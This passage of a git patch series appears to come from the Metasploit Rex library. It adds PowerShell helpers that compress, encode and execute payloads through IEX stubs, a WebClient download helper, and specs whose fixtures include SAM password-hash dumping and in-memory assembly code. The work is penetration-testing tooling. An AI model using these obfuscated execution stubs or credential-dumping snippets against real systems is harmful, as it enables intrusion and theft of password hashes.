+    def deflate_code(eof = nil)
+      # Compress using the Deflate algorithm
+      compressed_stream = ::Zlib::Deflate.deflate(code,
+      ::Zlib::BEST_COMPRESSION)
+
+      # Base64 encode the compressed file contents
+      encoded_stream = Rex::Text.encode_base64(compressed_stream)
+
+      # Build the powershell expression
+      # Decode base64 encoded command and create a stream object
+      psh_expression =  "$s=New-Object IO.MemoryStream(,"
+      psh_expression << "[Convert]::FromBase64String('#{encoded_stream}'));"
+      # Read & delete the first two bytes due to incompatibility with MS
+      psh_expression << "$s.ReadByte();"
+      psh_expression << "$s.ReadByte();"
+      # Uncompress and invoke the expression (execute)
+      psh_expression << "IEX (New-Object IO.StreamReader("
+      psh_expression << "New-Object IO.Compression.DeflateStream("
+      psh_expression << "$s,"
+      psh_expression << "[IO.Compression.CompressionMode]::Decompress)"
+      psh_expression << ")).ReadToEnd();"
+
+      # If eof is set, add a marker to signify end of code output
+      #if (eof && eof.length == 8) then psh_expression += "'#{eof}'" end
+      psh_expression << "echo '#{eof}';" if eof
+
+      @code = psh_expression
+    end
+
+    #
+    # Return Base64 encoded powershell code
+    #
+    # @return [String] Base64 encoded powershell code
+    def encode_code
+      @code = Rex::Text.encode_base64(Rex::Text.to_unicode(code))
+    end
+
+    #
+    # Return a gzip compressed powershell code wrapped in decoder stub
+    #
+    # @param eof [String] End of file identifier to append to code
+    #
+    # @return [String] Gzip compressed powershell code wrapped in
+    # decompression stub
+    def gzip_code(eof = nil)
+      # Compress using the Deflate algorithm
+      compressed_stream = Rex::Text.gzip(code)
+
+      # Base64 encode the compressed file contents
+      encoded_stream = Rex::Text.encode_base64(compressed_stream)
+
+      # Build the powershell expression
+      # Decode base64 encoded command and create a stream object
+      psh_expression =  "$s=New-Object IO.MemoryStream(,"
+      psh_expression << "[Convert]::FromBase64String('#{encoded_stream}'));"
+      # Uncompress and invoke the expression (execute)
+      psh_expression << "IEX (New-Object IO.StreamReader("
+      psh_expression << "New-Object IO.Compression.GzipStream("
+      psh_expression << "$s,"
+      psh_expression << "[IO.Compression.CompressionMode]::Decompress)"
+      psh_expression << ")).ReadToEnd();"
+
+      # If eof is set, add a marker to signify end of code output
+      #if (eof && eof.length == 8) then psh_expression += "'#{eof}'" end
+      psh_expression << "echo '#{eof}';" if eof
+
+      @code = psh_expression
+    end
+
+    #
+    # Compresses script contents with gzip (default) or deflate
+    #
+    # @param eof [String] End of file identifier to append to code
+    # @param gzip [Boolean] Whether to use gzip compression or deflate
+    # @param in_place [Boolean] Whether to update the current script
+    #   code or just return the output.
+    #
+    # @return [String] Compressed code wrapped in decompression stub
+    def compress_code(eof = nil, gzip = true, in_place = true)
+      code = gzip ? gzip_code(eof) : deflate_code(eof)
+      @code = code if in_place
+      return code
+    end
+
+    #
+    # Reverse the compression process
+    # Try gzip, inflate if that fails
+    #
+    # @return [String] Decompressed powershell code
+    def decompress_code
+      # Extract substring with payload
+      encoded_stream = @code.scan(/FromBase64String\('(.*)'/).flatten.first
+      # Decode and decompress the string
+      @code = ( Rex::Text.ungzip( Rex::Text.decode_base64(encoded_stream) ) ||
+        Rex::Text.zlib_inflate( Rex::Text.decode_base64(encoded_stream)) )
+      return code
+    end
+  end
+
+end
+end
+end
+
diff --git a/lib/rex/exploitation/powershell/param.rb b/lib/rex/exploitation/powershell/param.rb
new file mode 100644
index 0000000000..ac1cc3f581
--- /dev/null
+++ b/lib/rex/exploitation/powershell/param.rb
@@ -0,0 +1,30 @@
+# -*- coding: binary -*-
+
+require 'zlib'
+require 'rex/text'
+
+module Rex
+module Exploitation
+
+module Powershell
+
+  class Param
+    attr_accessor :klass, :name
+    def initialize(klass,name)
+      @klass = klass.strip.gsub(/\[|\]|\s/,'')
+      @name = name.strip.gsub(/\s|,/,'')
+    end
+
+    #
+    # To String
+    #
+    # @return [String] Powershell param
+    def to_s
+      "[#{klass}]$#{name}"
+    end
+  end
+
+end
+end
+end
+
diff --git a/lib/rex/exploitation/powershell/parser.rb b/lib/rex/exploitation/powershell/parser.rb
new file mode 100644
index 0000000000..fc25aa404c
--- /dev/null
+++ b/lib/rex/exploitation/powershell/parser.rb
@@ -0,0 +1,150 @@
+# -*- coding: binary -*-
+
+require 'zlib'
+require 'rex/text'
+
+module Rex
+module Exploitation
+
+module Powershell
+
+  module Parser
+    # Reserved special variables
+    # Acquired with: Get-Variable | Format-Table name, value -auto
+    RESERVED_VARIABLE_NAMES = [
+        '$$',
+        '$?',
+        '$^',
+        '$_',
+        '$args',
+        '$ConfirmPreference',
+        '$ConsoleFileName',
+        '$DebugPreference',
+        '$Env',
+        '$Error',
+        '$ErrorActionPreference',
+        '$ErrorView',
+        '$ExecutionContext',
+        '$false',
+        '$FormatEnumerationLimit',
+        '$HOME',
+        '$Host',
+        '$input',
+        '$LASTEXITCODE',
+        '$MaximumAliasCount',
+        '$MaximumDriveCount',
+        '$MaximumErrorCount',
+        '$MaximumFunctionCount',
+        '$MaximumHistoryCount',
+        '$MaximumVariableCount',
+        '$MyInvocation',
+        '$NestedPromptLevel',
+        '$null',
+        '$OutputEncoding',
+        '$PID',
+        '$PROFILE',
+        '$ProgressPreference',
+        '$PSBoundParameters',
+        '$PSCulture',
+        '$PSEmailServer',
+        '$PSHOME',
+        '$PSSessionApplicationName',
+        '$PSSessionConfigurationName',
+        '$PSSessionOption',
+        '$PSUICulture',
+        '$PSVersionTable',
+        '$PWD',
+        '$ReportErrorShowExceptionClass',
+        '$ReportErrorShowInnerException',
+        '$ReportErrorShowSource',
+        '$ReportErrorShowStackTrace',
+        '$ShellId',
+        '$StackTrace',
+        '$true',
+        '$VerbosePreference',
+        '$WarningPreference',
+        '$WhatIfPreference'
+      ].map(&:downcase).freeze
+
+    #
+    # Get variable names from code, removes reserved names from return
+    #
+    def get_var_names
+      our_vars = code.scan(/\$[a-zA-Z\-\_]+/).uniq.flatten.map(&:strip)
+      return our_vars.select {|v| !RESERVED_VARIABLE_NAMES.include?(v.downcase)}
+    end
+
+    #
+    # Get function names from code
+    #
+    def get_func_names
+      return code.scan(/function\s([a-zA-Z\-\_]+)/).uniq.flatten
+    end
+
+    # Attempt to find string literals in PSH expression
+    def get_string_literals
+      code.scan(/@"(.*)"@|@'(.*)'@/)
+    end
+
+    #
+    # Scan code and return matches with index
+    #
+    def scan_with_index(str,source=code)
+      ::Enumerator.new do |y|
+        source.scan(str) do
+          y << ::Regexp.last_match
+        end
+      end.map{|m| [m.to_s,m.offset(0)[0]]}
+    end
+
+    #
+    # Return matching bracket type
+    #
+    def match_start(char)
+      case char
+      when '{'
+        '}'
+      when '('
+        ')'
+      when '['
+        ']'
+      when '<'
+        '>'
+      end
+    end
+
+    #
+    # Extract block of code between inside brackets/parens
+    #
+    # Attempts to match the bracket at idx, handling nesting manually
+    # Once the balanced matching bracket is found, all script content
+    # between idx and the index of the matching bracket is returned
+    #
+    def block_extract(idx)
+      start = code[idx]
+      stop = match_start(start)
+      delims = scan_with_index(/#{Regexp.escape(start)}|#{Regexp.escape(stop)}/,code[idx+1..-1])
+      delims.map {|x| x[1] = x[1] + idx + 1}
+      c = 1
+      sidx = nil
+      # Go through delims till we balance, get idx
+      while not c == 0 and x = delims.shift do
+        sidx = x[1]
+        x[0] == stop ? c -=1 : c+=1
+      end
+      return code[idx..sidx]
+    end
+
+    def get_func(func_name, delete = false)
+      start = code.index(func_name)
+      idx = code[start..-1].index('{') + start
+      func_txt = block_extract(idx)
+      code.delete(ftxt) if delete
+      return Function.new(func_name,func_txt)
+    end
+  end # Parser
+
+end
+end
+end
+
diff --git a/lib/rex/exploitation/powershell/psh_methods.rb b/lib/rex/exploitation/powershell/psh_methods.rb
new file mode 100644
index 0000000000..398e5b2e1a
--- /dev/null
+++ b/lib/rex/exploitation/powershell/psh_methods.rb
@@ -0,0 +1,75 @@
+# -*- coding: binary -*-
+
+module Rex
+module Exploitation
+
+module Powershell
+
+  ##
+  # Convenience methods for generating powershell code in Ruby
+  ##
+
+  module PshMethods
+
+    #
+    # Download file via .NET WebClient
+    #
+    # @param src [String] URL to the file
+    # @param target [String] Location to save the file
+    #
+    # @return [String] Powershell code to download a file
+    def self.download(src,target=nil)
+      target ||= '$pwd\\' << src.split('/').last
+      return %Q^(new-object System.Net.WebClient).Downloadfile("#{src}", "#{target}")^
+    end
+
+    #
+    # Uninstall app, or anything named like app
+    #
+    # @param app [String] Name of application
+    # @param fuzzy [Boolean] Whether to apply a fuzzy match (-like) to
+    #   the application name
+    #
+    # @return [String] Powershell code to uninstall an application
+    def self.uninstall(app,fuzzy=true)
+      match = fuzzy ? '-like' : '-eq'
+      return %Q^$app = Get-WmiObject -Class Win32_Product | Where-Object { $_.Name #{match} "#{app}" }; $app.Uninstall()^
+    end
+
+    #
+    # Create secure string from plaintext
+    #
+    # @param str [String] String to create as a SecureString
+    #
+    # @return [String] Powershell code to create a SecureString
+    def self.secure_string(str)
+      return %Q^ConvertTo-SecureString -string '#{str}' -AsPlainText -Force$^
+    end
+
+    #
+    # Find PID of file lock owner
+    #
+    # @param filename [String] Filename
+    #
+    # @return [String] Powershell code to identify the PID of a file
+    #   lock owner
+    def self.who_locked_file?(filename)
+      return %Q^ Get-Process | foreach{$processVar = $_;$_.Modules | foreach{if($_.FileName -eq "#{filename}"){$processVar.Name + " PID:" + $processVar.id}}}^
+    end
+
+    #
+    # Return last time of login
+    #
+    # @param user [String] Username
+    #
+    # @return [String] Powershell code to return the last time of a user
+    #   login
+    def self.get_last_login(user)
+      return %Q^ Get-QADComputer -ComputerRole DomainController | foreach { (Get-QADUser -Service $_.Name -SamAccountName "#{user}").LastLogon} | Measure-Latest^
+    end
+  end
+
+end
+end
+end
+
diff --git a/lib/rex/exploitation/powershell/script.rb b/lib/rex/exploitation/powershell/script.rb
new file mode 100644
index 0000000000..9331f19fde
--- /dev/null
+++ b/lib/rex/exploitation/powershell/script.rb
@@ -0,0 +1,112 @@
+# -*- coding: binary -*-
+
+require 'zlib'
+require 'rex/text'
+
+module Rex
+module Exploitation
+
+module Powershell
+
+  class Script
+    attr_accessor :code
+    attr_reader :functions
+
+    include Output
+    include Parser
+    include Obfu
+    # Pretend we are actually a string
+    extend Forwardable
+    # In case someone messes with String we delegate based on its instance methods
+    #eval %Q|def_delegators :@code, :#{::String.instance_methods[0..(String.instance_methods.index(:class)-1)].join(', :')}|
+    def_delegators :@code, :each_line, :strip, :chars, :intern, :chr, :casecmp, :ascii_only?, :<, :tr_s,
+                   :!=, :capitalize!, :ljust, :to_r, :sum, :private_methods, :gsub,:dump, :match, :to_sym,
+                   :enum_for, :display, :tr_s!, :freeze, :gsub, :split, :rindex, :<<, :<=>, :+, :lstrip!,
+                   :encoding, :start_with?, :swapcase, :lstrip!, :encoding, :start_with?, :swapcase,
+                   :each_byte, :lstrip, :codepoints, :insert, :getbyte, :swapcase!, :delete, :rjust, :>=,
+                   :!, :count, :slice, :clone, :chop!, :prepend, :succ!, :upcase, :include?, :frozen?,
+                   :delete!, :chop, :lines, :replace, :next, :=~, :==, :rstrip!, :%, :upcase!, :each_char,
+                   :hash, :rstrip, :length, :reverse, :setbyte, :bytesize, :squeeze, :>, :center, :[],
+                   :<=, :to_c, :slice!, :chomp!, :next!, :downcase, :unpack, :crypt, :partition,
+                   :between?, :squeeze!, :to_s, :chomp, :bytes, :clear, :!~, :to_i, :valid_encoding?, :===,
+                   :tr, :downcase!, :scan, :sub!, :each_codepoint, :reverse!, :class, :size, :empty?, :byteslice,
+                   :initialize_clone, :to_str, :to_enum,:tap, :tr!, :trust, :encode!, :sub, :oct, :succ, :index,
+                   :[]=, :encode, :*, :hex, :to_f, :strip!, :rpartition, :ord, :capitalize, :upto, :force_encoding,
+                   :end_with?
+
+    def initialize(code)
+      @code = ''
+      begin
+        # Open code file for reading
+        fd = ::File.new(code, 'rb')
+        while (line = fd.gets)
+          @code << line
+        end
+
+        # Close open file
+        fd.close
+      rescue Errno::ENAMETOOLONG, Errno::ENOENT
+        # Treat code as a... code
+        @code = code.to_s.dup # in case we're eating another script
+      end
+      @functions = get_func_names.map {|f| get_func(f)}
+    end
+
+
+    ##
+    # Class methods
+    ##
+
+    #
+    # Convert binary to byte array, read from file if able
+    #
+    # @param input_data [String] Path to powershell file or powershell
+    #   code string
+    # @param var_name [String] Byte array variable name
+    #
+    # @return [String] input_data as a powershell byte array
+    def self.to_byte_array(input_data,var_name = Rex::Text.rand_text_alpha(rand(3)+3))
+      # File will raise an exception if the path contains null byte
+      if input_data.include? "\x00"
+        code = input_data
+      else
+        code = ::File.file?(input_data) ? ::File.read(input_data) : input_data
+      end
+
+      code = code.unpack('C*')
+      psh = "[Byte[]] $#{var_name} = 0x#{code[0].to_s(16)}"
+      lines = []
+      1.upto(code.length-1) do |byte|
+        if(byte % 10 == 0)
+          lines.push "\r\n$#{var_name} += 0x#{code[byte].to_s(16)}"
+        else
+          lines.push ",0x#{code[byte].to_s(16)}"
+        end
+      end
+
+      return psh << lines.join("") + "\r\n"
+    end
+
+    #
+    # ?? RageLtMan
+    #
+    # @param dir [String] ?
+    def self.psp_funcs(dir)
+      scripts = Dir.glob(File.expand_path(dir) + '/**/*').select {|e| e =~ /ps1$|psm1$/}
+      functions = scripts.map {|s| Script.new(s).functions}
+      return functions.flatten
+    end
+
+    #
+    # Return list of code modifier methods
+    #
+    # @return [Array] Code modifiers
+    def self.code_modifiers
+      self.instance_methods.select {|m| m =~ /^(strip|sub)/}
+    end
+  end # class Script
+
+end
+end
+end
+

From 98d2b2293b48fa16f8d8fb0a7f93086b1d69ce15 Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Sat, 26 Apr 2014 13:05:47 +0100
Subject: [PATCH 107/321] Unnecessary return

---
 lib/rex/exploitation/powershell.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/rex/exploitation/powershell.rb b/lib/rex/exploitation/powershell.rb
index c4a52c1213..697773062b 100644
--- a/lib/rex/exploitation/powershell.rb
+++ b/lib/rex/exploitation/powershell.rb
@@ -20,7 +20,7 @@ module Powershell
   #
   # @return [PowershellScript] PowerShellScript object
   def read_script(script_path)
-    return PowershellScript.new(script_path)
+    PowershellScript.new(script_path)
   end
 
   #

From 8031e50d35c1f5e4cd2e634f2ef9fdbcf84d3689 Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Sat, 26 Apr 2014 13:27:25 +0100
Subject: [PATCH 108/321] Make Exploitation::Powershell testable

Example test
---
 lib/rex/exploitation/powershell.rb           | 10 +++++-----
 spec/lib/rex/exploitation/powershell_spec.rb | 16 ++++++++++++++++
 2 files changed, 21 insertions(+), 5 deletions(-)
 create mode 100644 spec/lib/rex/exploitation/powershell_spec.rb

diff --git a/lib/rex/exploitation/powershell.rb b/lib/rex/exploitation/powershell.rb
index 697773062b..dd542e8f66 100644
--- a/lib/rex/exploitation/powershell.rb
+++ b/lib/rex/exploitation/powershell.rb
@@ -18,9 +18,9 @@ module Powershell
   #
   # @param script_path [String] Path to the Script File
   #
-  # @return [PowershellScript] PowerShellScript object
-  def read_script(script_path)
-    PowershellScript.new(script_path)
+  # @return [Script] Powershell Script object
+  def self.read_script(script_path)
+    Rex::Exploitation::Powershell::Script.new(script_path)
   end
 
   #
@@ -32,7 +32,7 @@ module Powershell
   # @param subs [Array] Substitutions to insert
   #
   # @return [String] Modified script file
-  def make_subs(script, subs)
+  def self.make_subs(script, subs)
     if ::File.file?(script)
       script = ::File.read(script)
     end
@@ -50,7 +50,7 @@ module Powershell
   # @param subs [String] A ; seperated list of substitutions
   #
   # @return [Array] An array of substitutions
-  def process_subs(subs)
+  def self.process_subs(subs)
     return [] if subs.nil? or subs.empty?
     new_subs = []
     subs.split(';').each do |set|
diff --git a/spec/lib/rex/exploitation/powershell_spec.rb b/spec/lib/rex/exploitation/powershell_spec.rb
new file mode 100644
index 0000000000..2ea36a4816
--- /dev/null
+++ b/spec/lib/rex/exploitation/powershell_spec.rb
@@ -0,0 +1,16 @@
+# -*- coding:binary -*-
+require 'spec_helper'
+
+require 'rex/exploitation/powershell'
+
+describe Rex::Exploitation::Powershell do
+
+  describe "::read_script" do
+    it 'should create a script from a string input' do
+      script = described_class.read_script("parp")
+      script.should be_a_kind_of Rex::Exploitation::Powershell::Script
+    end
+  end
+
+end
+

From 3ae8c3ff46f25bdc6aa6190c32c552509fce713f Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Fri, 25 Apr 2014 18:14:39 +0100
Subject: [PATCH 109/321] Basic specs

---
 spec/lib/rex/exploitation/powershell_spec.rb | 33 +++++++++++++++++++-
 1 file changed, 32 insertions(+), 1 deletion(-)

diff --git a/spec/lib/rex/exploitation/powershell_spec.rb b/spec/lib/rex/exploitation/powershell_spec.rb
index 2ea36a4816..6885691963 100644
--- a/spec/lib/rex/exploitation/powershell_spec.rb
+++ b/spec/lib/rex/exploitation/powershell_spec.rb
@@ -5,12 +5,43 @@ require 'rex/exploitation/powershell'
 
 describe Rex::Exploitation::Powershell do
 
+  let(:example_script) do
+    """function DumpHashes
+{
+    LoadApi
+    $bootkey = Get-BootKey;
+    $hbootKey = Get-HBootKey $bootkey;
+    Get-UserKeys | %{
+        $hashes = Get-UserHashes $_ $hBootKey;
+        \"{0}:{1}:{2}:{3}:::\" -f ($_.UserName,$_.Rid,
+            [BitConverter]::ToString($hashes[0]).Replace(\"-\",\"\").ToLower(),
+            [BitConverter]::ToString($hashes[1]).Replace(\"-\",\"\").ToLower());
+    }
+}
+DumpHashes"""
+  end
+
   describe "::read_script" do
     it 'should create a script from a string input' do
-      script = described_class.read_script("parp")
+      script = described_class.read_script(example_script)
       script.should be_a_kind_of Rex::Exploitation::Powershell::Script
     end
   end
 
+  describe "::process_subs" do
+    it 'should create an array of substitutions to process' do
+      subs = described_class.process_subs("BitConverter,ParpConverter;$bootkey,$parpkey;")
+      subs.should eq [['BitConverter','ParpConverter'],['$bootkey','$parpkey']]
+    end
+  end
+
+  describe "::make_subs" do
+    it 'should substitute values in script' do
+      script = described_class.make_subs(example_script,[['BitConverter','ParpConverter']])
+      script.include?('BitConverter').should be_false
+      script.include?('ParpConverter').should be_true
+    end
+  end
+
 end
 

From b860cecad67387bea090031cbb3c2dea228b2521 Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Fri, 25 Apr 2014 18:43:47 +0100
Subject: [PATCH 110/321] Function spec (doesnt pass)

---
 lib/rex/exploitation/powershell/function.rb   |  1 -
 .../exploitation/powershell/function_spec.rb  | 76 +++++++++++++++++++
 2 files changed, 76 insertions(+), 1 deletion(-)
 create mode 100644 spec/lib/rex/exploitation/powershell/function_spec.rb

diff --git a/lib/rex/exploitation/powershell/function.rb b/lib/rex/exploitation/powershell/function.rb
index 748a2dd328..074222af8c 100644
--- a/lib/rex/exploitation/powershell/function.rb
+++ b/lib/rex/exploitation/powershell/function.rb
@@ -1,6 +1,5 @@
 # -*- coding: binary -*-
 
-require 'zlib'
 require 'rex/text'
 
 module Rex
diff --git a/spec/lib/rex/exploitation/powershell/function_spec.rb b/spec/lib/rex/exploitation/powershell/function_spec.rb
new file mode 100644
index 0000000000..6ad49989b9
--- /dev/null
+++ b/spec/lib/rex/exploitation/powershell/function_spec.rb
@@ -0,0 +1,76 @@
+# -*- coding:binary -*-
+require 'spec_helper'
+
+require 'rex/exploitation/powershell'
+
+describe Rex::Exploitation::Powershell::Function do
+
+  let(:function_name) do
+    Rex::Text.rand_text_alpha(15)
+  end
+
+  let(:example_function_without_params) do
+    """
+{
+    ls HKLM:\SAM\SAM\Domains\Account\Users |
+        where {$_.PSChildName -match \"^[0-9A-Fa-f]{8}$\"} |
+            Add-Member AliasProperty KeyName PSChildName -PassThru |
+            Add-Member ScriptProperty Rid {[Convert]::ToInt32($this.PSChildName, 16)} -PassThru |
+            Add-Member ScriptProperty V {[byte[]]($this.GetValue(\"V\"))} -PassThru |
+            Add-Member ScriptProperty UserName {Get-UserName($this.GetValue(\"V\"))} -PassThru |
+            Add-Member ScriptProperty HashOffset {[BitConverter]::ToUInt32($this.GetValue(\"V\")[0x9c..0x9f],0) + 0xCC} -PassThru
+}"""
+  end
+
+  let(:example_function_with_params) do
+    """
+    {
+        Param
+        (
+            [OutputType([Type])]
+
+            [Parameter( Position = 0)]
+            [Type[]]
+            $Parameters = (New-Object Type[](0)),
+
+            [Parameter( Position = 1 )]
+            [Type]
+            $ReturnType = [Void]
+        )
+
+        $Domain = [AppDomain]::CurrentDomain
+        $DynAssembly = New-Object System.Reflection.AssemblyName('ReflectedDelegate')
+        $AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, [System.Reflection.Emit.AssemblyBuilderAccess]::Run)
+        $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('InMemoryModule', $false)
+        $TypeBuilder = $ModuleBuilder.DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
+        $ConstructorBuilder = $TypeBuilder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $Parameters)
+        $ConstructorBuilder.SetImplementationFlags('Runtime, Managed')
+        $MethodBuilder = $TypeBuilder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $ReturnType, $Parameters)
+        $MethodBuilder.SetImplementationFlags('Runtime, Managed')
+
+        Write-Output $TypeBuilder.CreateType()
+    }"""
+  end
+
+  describe "::initialize" do
+    it 'should handle a function without params' do
+      function = Rex::Exploitation::Powershell::Function.new(function_name, example_function_without_params)
+      function.name.should eq function_name
+      function.code.should eq example_function_without_params
+      function.to_s.include?("function #{function_name} #{example_function_without_params}").should be_true
+      function.params.should be_kind_of Array
+      function.params.empty?.should be_true
+    end
+
+    it 'should handle a function with params' do
+      function = Rex::Exploitation::Powershell::Function.new(function_name, example_function_with_params)
+      function.name.should eq function_name
+      function.code.should eq example_function_with_params
+      function.to_s.include?("function #{function_name} #{example_function_with_params}").should be_true
+      function.params.should be_kind_of Array
+      function.params.length.should be == 2
+    end
+  end
+
+end
+

From 399928cf69502dbd52e61a5f25440a825dc473d2 Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Mon, 5 May 2014 13:37:17 +0100
Subject: [PATCH 111/321] Remove unnecessary requires

---
 lib/rex/exploitation/powershell/function.rb | 2 --
 lib/rex/exploitation/powershell/param.rb    | 3 ---
 2 files changed, 5 deletions(-)

diff --git a/lib/rex/exploitation/powershell/function.rb b/lib/rex/exploitation/powershell/function.rb
index 074222af8c..8468380bd0 100644
--- a/lib/rex/exploitation/powershell/function.rb
+++ b/lib/rex/exploitation/powershell/function.rb
@@ -1,7 +1,5 @@
 # -*- coding: binary -*-
 
-require 'rex/text'
-
 module Rex
 module Exploitation
 
diff --git a/lib/rex/exploitation/powershell/param.rb b/lib/rex/exploitation/powershell/param.rb
index ac1cc3f581..652f0af1ec 100644
--- a/lib/rex/exploitation/powershell/param.rb
+++ b/lib/rex/exploitation/powershell/param.rb
@@ -1,8 +1,5 @@
 # -*- coding: binary -*-
 
-require 'zlib'
-require 'rex/text'
-
 module Rex
 module Exploitation
 

From 589d235a8064f1cce283e1c557252541956bbfae Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Mon, 5 May 2014 13:46:52 +0100
Subject: [PATCH 112/321] Simple param spec

---
 .../rex/exploitation/powershell/param_spec.rb | 27 +++++++++++++++++++
 1 file changed, 27 insertions(+)
 create mode 100644 spec/lib/rex/exploitation/powershell/param_spec.rb

diff --git a/spec/lib/rex/exploitation/powershell/param_spec.rb b/spec/lib/rex/exploitation/powershell/param_spec.rb
new file mode 100644
index 0000000000..2ae71205c2
--- /dev/null
+++ b/spec/lib/rex/exploitation/powershell/param_spec.rb
@@ -0,0 +1,27 @@
+# -*- coding:binary -*-
+require 'spec_helper'
+
+require 'rex/exploitation/powershell'
+
+describe Rex::Exploitation::Powershell::Param do
+
+  let(:param_name) do
+    Rex::Text.rand_text_alpha(15)
+  end
+
+  let(:klass_name) do
+    Rex::Text.rand_text_alpha(15)
+  end
+
+  describe "::initialize" do
+    it 'should create a param' do
+      param = Rex::Exploitation::Powershell::Param.new(klass_name, param_name)
+      param.should be
+      param.name.should eq param_name
+      param.klass.should eq klass_name
+      param.to_s.include?("[#{klass_name}]$#{param_name}").should be_true
+    end
+  end
+
+end
+

From 162b6a8ab91548651e7d049ad72fb50625bf6465 Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Mon, 5 May 2014 14:48:18 +0100
Subject: [PATCH 113/321] Add output spec

---
 lib/rex/exploitation/powershell/output.rb     |  26 ++--
 .../exploitation/powershell/output_spec.rb    | 115 ++++++++++++++++++
 2 files changed, 131 insertions(+), 10 deletions(-)
 create mode 100644 spec/lib/rex/exploitation/powershell/output_spec.rb

diff --git a/lib/rex/exploitation/powershell/output.rb b/lib/rex/exploitation/powershell/output.rb
index 19e5a4fc23..7a72ca01fd 100644
--- a/lib/rex/exploitation/powershell/output.rb
+++ b/lib/rex/exploitation/powershell/output.rb
@@ -35,7 +35,8 @@ module Powershell
       code.split(/\r\n|\n/).each_with_index do |line,idx|
         numbered << "#{idx}: #{line}"
       end
-      return numbered
+
+      numbered
     end
 
     #
@@ -119,14 +120,10 @@ module Powershell
     #
     # @param eof [String] End of file identifier to append to code
     # @param gzip [Boolean] Whether to use gzip compression or deflate
-    # @param in_place [Boolean] Whether to update the current script
-    #   code or just return the output.
     #
     # @return [String] Compressed code wrapped in decompression stub
-    def compress_code(eof = nil, gzip = true, in_place = true)
-      code = gzip ? gzip_code(eof) : deflate_code(eof)
-      @code = code if in_place
-      return code
+    def compress_code(eof = nil, gzip = true)
+      @code = gzip ? gzip_code(eof) : deflate_code(eof)
     end
 
     #
@@ -138,9 +135,18 @@ module Powershell
       # Extract substring with payload
       encoded_stream = @code.scan(/FromBase64String\('(.*)'/).flatten.first
       # Decode and decompress the string
-      @code = ( Rex::Text.ungzip( Rex::Text.decode_base64(encoded_stream) ) ||
-        Rex::Text.zlib_inflate( Rex::Text.decode_base64(encoded_stream)) )
-      return code
+      unencoded = Rex::Text.decode_base64(encoded_stream)
+      begin
+        @code = Rex::Text.ungzip(unencoded) || Rex::Text.zlib_inflate(unencoded)
+      rescue Zlib::GzipFile::Error
+        begin
+          @code = Rex::Text.zlib_inflate(unencoded)
+        rescue Zlib::DataError => e
+          raise RuntimeError, "Invalid compression"
+        end
+      end
+
+      @code
     end
   end
 
diff --git a/spec/lib/rex/exploitation/powershell/output_spec.rb b/spec/lib/rex/exploitation/powershell/output_spec.rb
new file mode 100644
index 0000000000..e57bf77888
--- /dev/null
+++ b/spec/lib/rex/exploitation/powershell/output_spec.rb
@@ -0,0 +1,115 @@
+# -*- coding:binary -*-
+require 'spec_helper'
+
+require 'rex/exploitation/powershell'
+
+describe Rex::Exploitation::Powershell::Output do
+
+  let(:example_script) do
+    Rex::Text.rand_text_alpha(400)
+  end
+
+  let(:subject) do
+    Rex::Exploitation::Powershell::Script.new(example_script)
+  end
+
+  let(:eof) do
+    Rex::Text.rand_text_alpha(10)
+  end
+
+  describe "::to_s" do
+    it 'should print the script' do
+      subject.to_s.should eq example_script
+    end
+  end
+
+  describe "::size" do
+    it 'should return the size of the script' do
+      subject.size.should eq example_script.size
+    end
+  end
+
+  describe "::to_s_lineno" do
+    it 'should print the script with line numbers' do
+      subject.to_s_lineno.should eq "0: #{example_script}"
+    end
+  end
+
+  describe "::deflate_code" do
+    it 'should zlib the code and wrap in powershell in uncompression stub' do
+      compressed = subject.deflate_code
+      compressed.include?('IO.Compression.DeflateStream').should be_true
+      compressed =~ /FromBase64String\('([A-Za-z0-9\/+=]+)'\)/
+      $1.size.should be < Rex::Text.encode_base64(example_script).size
+      compressed.should eq subject.code
+    end
+
+    it 'should append an eof marker if specified' do
+      compressed = subject.deflate_code(eof)
+      compressed.include?("echo '#{eof}';").should be_true
+    end
+  end
+
+  describe "::encode_code" do
+    it 'should base64 encode the code' do
+      encoded = subject.encode_code
+      encoded.should eq subject.code
+      encoded =~ /^([A-Za-z0-9\/+=]+)$/
+      $1.size.should eq encoded.size
+    end
+  end
+
+  describe "::gzip_code" do
+    it 'should gzip the code and wrap in powershell in uncompression stub' do
+      compressed = subject.gzip_code
+      compressed.include?('IO.Compression.GzipStream').should be_true
+      compressed =~ /FromBase64String\('([A-Za-z0-9\/+=]+)'\)/
+      $1.size.should be < Rex::Text.encode_base64(example_script).size
+      compressed.should eq subject.code
+    end
+
+    it 'should append an eof marker if specified' do
+      compressed = subject.gzip_code(eof)
+      compressed.include?("echo '#{eof}';").should be_true
+    end
+  end
+
+  describe "::compress_code" do
+    it 'should gzip by default' do
+      compressed = subject.compress_code
+      compressed.include?('IO.Compression.GzipStream').should be_true
+    end
+
+    it 'should deflate if gzip is false' do
+      compressed = subject.compress_code(nil,false)
+      compressed.include?('IO.Compression.DeflateStream').should be_true
+    end
+
+    it 'should append an eof' do
+      compressed = subject.compress_code(eof)
+      compressed.include?("echo '#{eof}';").should be_true
+    end
+  end
+
+  describe "::decompress_code" do
+    it 'should locate the base64 string and decompress it when deflate is used' do
+      compressed = subject.compress_code(nil, false)
+      decompressed = subject.decompress_code
+      decompressed.should eq example_script
+    end
+
+    it 'should locate the base64 string and decompress it when gzip is used' do
+      compressed = subject.compress_code
+      decompressed = subject.decompress_code
+      decompressed.should eq example_script
+    end
+
+    it 'should raise a RuntimeException if the Base64 string is not compressed/corrupted' do
+      corrupted = "FromBase64String('parp')"
+      subject.code = corrupted
